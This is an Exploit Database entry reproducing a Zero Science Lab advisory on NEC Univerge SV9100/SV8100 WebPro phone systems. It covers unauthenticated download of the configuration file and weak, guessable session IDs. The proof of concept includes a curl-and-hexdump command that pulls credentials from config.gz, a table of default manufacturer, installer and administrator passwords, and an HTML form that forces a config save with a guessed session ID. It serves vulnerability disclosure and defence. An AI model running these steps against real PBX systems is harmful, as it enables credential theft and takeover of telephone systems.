NEC Univerge SV9100/SV8100 WebPro 10.0 – Configuration Download

• Exploit Database
• 16 阅读

• 作者： LiquidWorm
  日期： 2018-01-23
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/43858/

• NEC Univerge SV9100/SV8100 WebPro 10.0 Remote Configuration Download
  
  
  Vendor: NEC Corporation
  Product web page: http://www.nec.com
  Affected version: WebPro <=10.00
  DSP Firmware Version: 12.11.00.02
  
  
  Summary: NEC's UNIVERGE® SV9100 is the unified communications (UC)
  solution of choice for small and medium businesses (SMBs) who don't
  want to be left behind. Designed to fit your unique needs, the UNIVERGE
  SV9100 platform is a powerful communications solution that provides
  SMBs with the efficient, easy-to-deploy, mobile technology that they
  require.
  
  Desc: The gzipped telephone system configuration file 'config.gz' or
  'config.pcpx' that contains the unencrypted data file 'conf.pcpn',
  can be downloaded by an attacker from the root directory if previously
  generated by a privileged user. Attacker can also sniff the network
  and hijack the session id which resides in a GET request to further
  generate the config file. The sessionid can also be brute-forced
  because of its predictability containing 5-digit number. This will
  enable the attacker to disclose sensitive information and help her
  in authentication bypass, privilege escalation, system access and
  denial of service via config modification.
  
  Tested on: Henry/1.1
   NEC-i SV8100-NA 08.00/2.1
   NEC SV9100-GE 07.00.52/2.1
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2018-5448
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5448.php
  
  
  11.12.2017
  
  --
  
  
  Disclosing default credentials with weak password policy:
  - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  
  # curl -O "http://192.168.1.1:8001/config.gz" ; gzip -d config.gz ; hexdump -C -s 0x041f220 -n 352 config
  % Total% Received % XferdAverage Speed TimeTime TimeCurrent
   DloadUpload Total SpentLeftSpeed
  100 66253100 662530 01717100:00:030:00:03 --:--:-- 17168
  0041f22000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................|
  *
  0041f30000 00 00 6e 65 63 69 6920 20 20 20 20 35 38 34|...necii 584|
  0041f31034 37 20 20 20 01 00 7465 63 68 20 20 20 20 20|47 ..tech |
  0041f32020 31 32 33 34 35 36 3738 02 00 41 44 4d 49 4e| 12345678..ADMIN|
  0041f33031 20 20 20 20 30 30 3030 20 20 20 20 03 00 41|10000..A|
  0041f34044 4d 49 4e 32 20 20 2020 39 39 39 39 20 20 20|DMIN29999 |
  0041f35020 04 00 55 53 45 52 3120 20 20 20 20 31 31 31| ..USER1 111|
  0041f36031 20 20 20 20 05 00 6174 65 6c 20 20 20 20 20|1..atel |
  0041f37020 35 38 34 34 37 20 2020 02 00 20 20 20 20 20| 58447 .. |
  0041f380
  
  
  Level:User:Password:Role:
  - - - - - - - - - - - - -
  
  1:atel:58447:MAN (Manufacturer)
  1:necii:47544:MAN(Manufacturer)
  1:necii:58447:MAN(Manufacturer)
  2:sltech:12345678:IN (Installer)
  2:tech:12345678:IN (Installer)
  3:ADMIN1:0000:SA (System Administrator A)
  3:admin1:0000:SA (System Administrator A)
  4:ADMIN2:9999:SB (System Administrator B)
  4:admin2:9999:SB (System Administrator B)
  4:USER1:1111:UA(User Administrator)
  5:USER1:1111441:UA (User Administrator)
  5:user1:1111:UA(User Administrator)
  
  
  SAVE_CONFIG() request (Save to PC) with brute-forceable session
  that will generate the config.gz / config.pcpx config file:
  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  
  <html>
  <body>
  <form action="http://192.168.1.1:8001/SaveConfig.htm?sessionId=31337&SAVE_CONFIG()" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="hasDataChanged" value="0" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>